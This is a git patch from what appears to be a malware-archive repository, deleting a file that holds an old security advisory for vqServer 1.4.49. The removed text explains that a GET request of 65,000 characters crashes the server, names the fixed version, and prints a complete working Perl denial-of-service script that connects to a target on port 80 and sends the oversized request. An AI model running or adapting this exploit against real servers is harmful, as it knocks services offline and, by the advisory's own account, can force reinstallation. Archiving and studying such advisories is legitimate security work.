From c980f2b845c7d992b4b03a4e54f89e123086648b Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 01:21:59 -0600 Subject: [PATCH] Delete DoS.Perl.Vqserver na --- Perl/DoS.Perl.Vqserver | 71 ------------------------------------------ 1 file changed, 71 deletions(-) delete mode 100644 Perl/DoS.Perl.Vqserver diff --git a/Perl/DoS.Perl.Vqserver b/Perl/DoS.Perl.Vqserver deleted file mode 100644 index 33df7cc5..00000000 --- a/Perl/DoS.Perl.Vqserver +++ /dev/null @@ -1,71 +0,0 @@ -DHC Advisory -Advisory for vqServer 1.4.49 -vqServer is made by vqSoft. Site: http://www.vqsoft.com -by nemesystm of the DHC -(http://dhcorp.cjb.net - auto45040@hushmail.com) - -/-|=[explaination]=|-\ -When sending vqServer version 1.4.49 a malformed URL request it will crash -the service. This has been verified to work on the Windows version, but -it probably is in the linux/unix version and prior versions too. - -/-|=[testing it]=|-\ -To test this vulnerability, send a GET request with 65000 characters. -So: -GET /AAA (hit return =) -Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste -that much characters in their browser fields (www.server.com/AAA) you will -have to use something like Telnet. -You can easily program something to print 65000 chars in Perl: -open (OUT, ">$ARGV[0]"); -print OUT ("GET /"); -print OUT ("A" x 65000); -then it's just a cut and paste. -Or you can use the example code below - -/-|=[fix]=|-\ -the latest edition of vqServer (1.9.47) is unaffected by this. It is available -for download at www.vqsoft.com - -/-|=[notes]=|-\ -PUT, POST and the Administration port do not seem to be affected by a high -amount of characters. The Windows version needed a reinstall every five -or so crashes. A reboot or total shutdown did not help. - -/-|=[exploit code]=|-\ -sinfony quickly wrote some code so you can see if you're vulnerable. - -# DoS exploit for vqServer 1.4.49 -# This vulnerability was discovered by nemesystm -# (auto45040@hushmail.com) -# -# code by: sinfony (chinesef00d@hotmail.com) -# [confess.sins.labs] (http://www.ro0t.nu/csl) -# and DHC member -# -# kiddie quote of the year: -# dude piffy stfu i bet you don't even know how to exploit it - -die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n -usage: $0 \n" -if $#ARGV != 0; - -use IO::Socket; - -$host = $ARGV[0]; -$port = 80; - -print "Connecting to $host on port $port...\n"; -$suck = IO::Socket::INET-> - new(Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>$port) - || die "$host isnt a webserver you schmuck.\n"; - -$a = A; -$send = $a x 65000; - print "Connected, sending exploit.\n"; - print $suck "GET /$send\n"; -sleep(3); - print "Exploit sent. vqServer should be dead.\n"; -close($suck) \ No newline at end of file